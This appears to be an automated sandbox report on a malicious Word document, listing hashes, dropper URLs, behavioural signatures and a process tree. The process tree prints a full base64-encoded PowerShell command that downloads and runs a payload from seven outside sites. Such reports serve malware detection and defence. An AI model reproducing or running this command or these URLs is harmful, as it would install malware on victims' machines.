Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    30/04/2024, 23:17

General

  • Target

    0aa381312ab7553cb4a603e8e57c8582_JaffaCakes118.doc

  • Size

    199KB

  • MD5

    0aa381312ab7553cb4a603e8e57c8582

  • SHA1

    f9f69404ebdf590ce11aec99a45bc07caabd654d

  • SHA256

    1baca6df5405b1382432d42c2e064da832f47d748a7e69ce461a438d1e9eeb76

  • SHA512

    34980179d8fc789b38b2ad8a05fc16b95869d2e80847be83751a735e4a5d5e6b51adac52455366a54e3a554271f7ab378ed518a13b6da3deb0ea2977abcf404d

  • SSDEEP

    1536:PGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilpfsdKY7xST/Ephkop8cEpTWj1i:xrfrzOH98ipgaEDvxBYae

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://houtai.xiaopbk.com/install/t0H/

exe.dropper

https://gudangalami.com/ivo6rp/UaBj2/

exe.dropper

https://webhostingsrilanka.info/pkrgs/ODn/

exe.dropper

http://luzzeri.com/wp-includes/T1mrkC/

exe.dropper

http://mobithem.com/blogs/Z3/

exe.dropper

http://planosdesaudesemcarencia.com/erros/E8iv/

exe.dropper

http://lookuppopup.co.uk/content/uploads/XNEm9/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0aa381312ab7553cb4a603e8e57c8582_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABEAHcAdgBnAG4ANQBfAD0AKAAnAFkAawAnACsAKAAnADYAJwArACcAbQBrADgAaAAnACkAKQA7ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAGUAcgBQAHIATwBmAGkATABFAFwARQBNAGsAcgBFAEwASwBcAHQAZwA4ADAAdQBSADEAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBDAHQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABFAEMAVQBSAGAAaQBUAHkAUABSAGAAbwB0AE8AYwBgAE8ATAAiACAAPQAgACgAJwB0ACcAKwAnAGwAcwAnACsAKAAnADEAJwArACcAMgAsACcAKQArACgAJwAgAHQAbABzACcAKwAnADEAMQAnACsAJwAsACAAdABsAHMAJwApACkAOwAkAFYAbQBmAHoAdAA1ADMAIAA9ACAAKAAnAFYAdgAnACsAJwB2ACcAKwAoACcAcQBkAG0AJwArACcAMgAnACkAKQA7ACQASABuAHcAZQB1AHYANAA9ACgAJwBRACcAKwAoACcAeQB1ADkAJwArACcAagAnACsAJwB3AHMAJwApACkAOwAkAEEAdQAwAG4AbABxAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACgAJwBmACcAKwAnAGcASwAnACkAKwAoACcARQBtACcAKwAnAGsAcgBlACcAKQArACgAJwBsAGsAJwArACcAZgAnACsAJwBnAEsAVABnACcAKwAnADgAMAB1ACcAKQArACgAJwByACcAKwAnADEAZgBnAEsAJwApACkALgAiAFIARQBgAHAAYABMAGEAQwBFACIAKAAoAFsAQwBIAGEAUgBdADEAMAAyACsAWwBDAEgAYQBSAF0AMQAwADMAKwBbAEMASABhAFIAXQA3ADUAKQAsACcAXAAnACkAKQArACQAVgBtAGYAegB0ADUAMwArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAEoAdAB1ADUAcQA5AG0APQAoACgAJwBaACcAKwAnAHYAZQAnACkAKwAoACcAMAA4ACcAKwAnAGoAbwAnACkAKQA7ACQAVwBfAHEAdwAyAGwAaAA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAJwArACcAZQAnACsAJwBjAHQAJwApACAATgBFAHQALgBXAEUAQgBDAEwAaQBlAE4AdAA7ACQARgByAHcAeQB6AHEAdgA9ACgAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAcwA6ACcAKwAnAC8ALwBoAG8AJwArACcAdQB0AGEAJwApACsAKAAnAGkALgAnACsAJwB4AGkAJwApACsAJwBhACcAKwAoACcAbwBwAGIAawAuAGMAbwAnACsAJwBtACcAKwAnAC8AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQBsACcAKwAnAGwAJwApACsAKAAnAC8AdAAwACcAKwAnAEgALwAqACcAKQArACgAJwBoAHQAdAAnACsAJwBwAHMAJwApACsAJwA6AC8AJwArACcALwAnACsAKAAnAGcAJwArACcAdQBkAGEAbgAnACkAKwAoACcAZwBhAGwAJwArACcAYQAnACkAKwAoACcAbQAnACsAJwBpAC4AJwArACcAYwBvAG0ALwAnACkAKwAoACcAaQAnACsAJwB2ACcAKwAnAG8ANgByACcAKwAnAHAALwBVAGEAQgBqACcAKQArACgAJwAyACcAKwAnAC8AKgBoACcAKwAnAHQAdABwACcAKQArACcAcwA6ACcAKwAoACcALwAvAHcAZQAnACsAJwBiACcAKwAnAGgAbwBzAHQAaQAnACkAKwAnAG4AJwArACcAZwAnACsAJwBzACcAKwAnAHIAaQAnACsAJwBsACcAKwAoACcAYQBuACcAKwAnAGsAYQAnACkAKwAoACcALgBpAG4AJwArACcAZgBvAC8AJwArACcAcAAnACsAJwBrAHIAZwBzAC8ATwBEAG4ALwAnACkAKwAnACoAaAAnACsAKAAnAHQAJwArACcAdABwACcAKQArACcAOgAnACsAKAAnAC8AJwArACcALwBsAHUAJwApACsAKAAnAHoAegBlACcAKwAnAHIAJwArACcAaQAuAGMAJwApACsAJwBvAG0AJwArACcALwAnACsAKAAnAHcAJwArACcAcAAtACcAKQArACcAaQBuACcAKwAoACcAYwAnACsAJwBsAHUAZAAnACkAKwAnAGUAJwArACgAJwBzAC8AVAAxACcAKwAnAG0AcgAnACsAJwBrAEMALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKQArACgAJwAvAG0AJwArACcAbwAnACkAKwAoACcAYgBpAHQAJwArACcAaAAnACkAKwAnAGUAbQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAoACcAYgBsACcAKwAnAG8AZwBzAC8AJwApACsAJwBaADMAJwArACgAJwAvACcAKwAnACoAaAAnACkAKwAnAHQAJwArACcAdABwACcAKwAoACcAOgAvAC8AcAAnACsAJwBsACcAKQArACgAJwBhAG4AJwArACcAbwAnACkAKwAnAHMAJwArACcAZABlACcAKwAoACcAcwAnACsAJwBhAHUAJwApACsAJwBkAGUAJwArACgAJwBzACcAKwAnAGUAbQBjACcAKwAnAGEAcgBlAG4AJwApACsAJwBjAGkAJwArACgAJwBhAC4AJwArACcAYwBvACcAKwAnAG0ALwBlACcAKQArACgAJwByAHIAJwArACcAbwAnACkAKwAoACcAcwAvAEUAOAAnACsAJwBpACcAKQArACgAJwB2ACcAKwAnAC8AKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcAA6ACcAKwAnAC8ALwBsAG8AbwAnACkAKwAnAGsAdQAnACsAJwBwACcAKwAoACcAcAAnACsAJwBvAHAAJwApACsAJwB1ACcAKwAoACcAcAAuAGMAJwArACcAbwAuAHUAJwArACcAawAvAGMAJwArACcAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAbgB0AC8AJwArACcAdQBwAGwAbwBhAGQAJwArACcAcwAvAFgAJwApACsAKAAnAE4ARQAnACsAJwBtACcAKQArACcAOQAvACcAKQAuACIAUwBwAGAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABXADYANwBfAGkANgBoAD0AKAAnAE0AdAAnACsAJwB6ACcAKwAoACcAeAAnACsAJwBuAGoAYwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEQAdwBxADMANABvADUAIABpAG4AIAAkAEYAcgB3AHkAegBxAHYAKQB7AHQAcgB5AHsAJABXAF8AcQB3ADIAbABoAC4AIgBEAGAAbwB3AE4AbABPAGAAQQBkAEYAYABJAGwARQAiACgAJABEAHcAcQAzADQAbwA1ACwAIAAkAEEAdQAwAG4AbABxAHUAKQA7ACQAQwBpAGQAdgA0ADgAawA9ACgAKAAnAEEAMgAnACsAJwBmADAAcQAnACkAKwAnADUAcQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQAQQB1ADAAbgBsAHEAdQApAC4AIgBMAGUAYABOAGcAVABoACIAIAAtAGcAZQAgADIANwA2ADkANQApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACgAJABBAHUAMABuAGwAcQB1ACkAOwAkAFQAYgBvADEAcwBkAHQAPQAoACgAJwBGACcAKwAnAG0AOAAnACkAKwAnAGkAJwArACgAJwB6ACcAKwAnAHMAMQAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA2AHkAZwA0AGEAXwA9ACgAJwBOADAAJwArACgAJwBzAHoAJwArACcAagAnACkAKwAnADgAeQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEkAbQB3AGgAeQB0AHYAPQAoACcATwAnACsAKAAnAGoAJwArACcAdgB1AG8AZQBtACcAKQApAA==
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2384

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            2d4c8d7a078bb86bf68ac994f50065e2

            SHA1

            43105a97afcfa7f6e7c3b062b8cdfa5e5e3288fa

            SHA256

            dbc7b58038dc5116df06b78230cd9aecf48399fa35e397453bd4be2c74702b0e

            SHA512

            c78111c11cc0a6add17ccc31b33c77bbc2ab361f61a9d2c93f76ecc6ab4afe0e8262726e924a73316224803868da9d97361ad8f76d04d09a6284c197a097a251

          • memory/2208-25-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-26-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-6-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-7-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-10-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-24-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-8-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-20-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-16-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-22-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-21-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-18-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-17-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-14-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-13-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-12-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-11-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-0-0x000000002F9D1000-0x000000002F9D2000-memory.dmp

            Filesize

            4KB

          • memory/2208-2-0x00000000714DD000-0x00000000714E8000-memory.dmp

            Filesize

            44KB

          • memory/2208-27-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-9-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-23-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-32-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-31-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-30-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-29-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-28-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-33-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-67-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-66-0x00000000714DD000-0x00000000714E8000-memory.dmp

            Filesize

            44KB

          • memory/2208-45-0x00000000714DD000-0x00000000714E8000-memory.dmp

            Filesize

            44KB

          • memory/2208-46-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-48-0x0000000000100000-0x0000000000200000-memory.dmp

            Filesize

            1024KB

          • memory/2208-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2208-65-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2384-40-0x0000000002790000-0x0000000002798000-memory.dmp

            Filesize

            32KB

          • memory/2384-39-0x000000001B530000-0x000000001B812000-memory.dmp

            Filesize

            2.9MB